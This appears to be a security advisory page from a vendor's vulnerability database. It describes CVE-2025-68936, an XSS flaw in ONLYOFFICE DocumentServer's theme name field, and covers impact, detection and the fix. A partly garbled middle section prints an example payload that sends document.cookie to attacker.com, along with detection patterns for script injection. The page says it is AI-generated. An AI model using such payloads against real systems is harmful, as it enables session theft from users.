
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-68936 is a Cross-Site Scripting (XSS) vulnerability in ONLYOFFICE Docs (DocumentServer) that allows attackers to inject malicious scripts via the Color theme name field. It affects all versions of ONLYOFFICE DocumentServer before 9.2.1. The vulnerability was published on December 25, 2025, and has a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE, ONLYOFFICE Changelog).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-supplied input in the Color theme name field within ONLYOFFICE DocumentServer. An attacker can craft a malicious theme name containing JavaScript payloads that are rendered and executed in the victim's browser when they interact with the themed document or interface. Exploitation requires user interaction (e.g., a victim opening or viewing a crafted document/theme), and no authentication is required to deliver the payload. The scope is changed, meaning the injected script can affect resources beyond the originating document context (Red Hat CVE, ONLYOFFICE Changelog).
Successful exploitation can result in low-level confidentiality and integrity impacts within the victim's browser session, such as session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. Because the scope is changed, the injected script may affect browser contexts beyond the immediate application, potentially enabling phishing or data exfiltration. Availability is not directly impacted by this vulnerability (Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent event-handler-based payload.<script>, onerror=, javascript:) in POST/PUT requests to the DocumentServer API.ONLYOFFICE has addressed this vulnerability in DocumentServer version 9.2.1. Users should upgrade to version 9.2.1 or later as the primary remediation. No specific configuration-based workarounds have been publicly documented; restricting access to theme creation/sharing features for untrusted users may reduce exposure until patching is possible (ONLYOFFICE Changelog, Red Hat CVE).
Coverage of CVE-2025-68936 has been limited to vulnerability database aggregators and automated security feeds. Red Hat tracked the CVE as of December 26, 2025. No notable researcher commentary, vendor blog posts, or significant social media discussion beyond automated CVE announcements has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."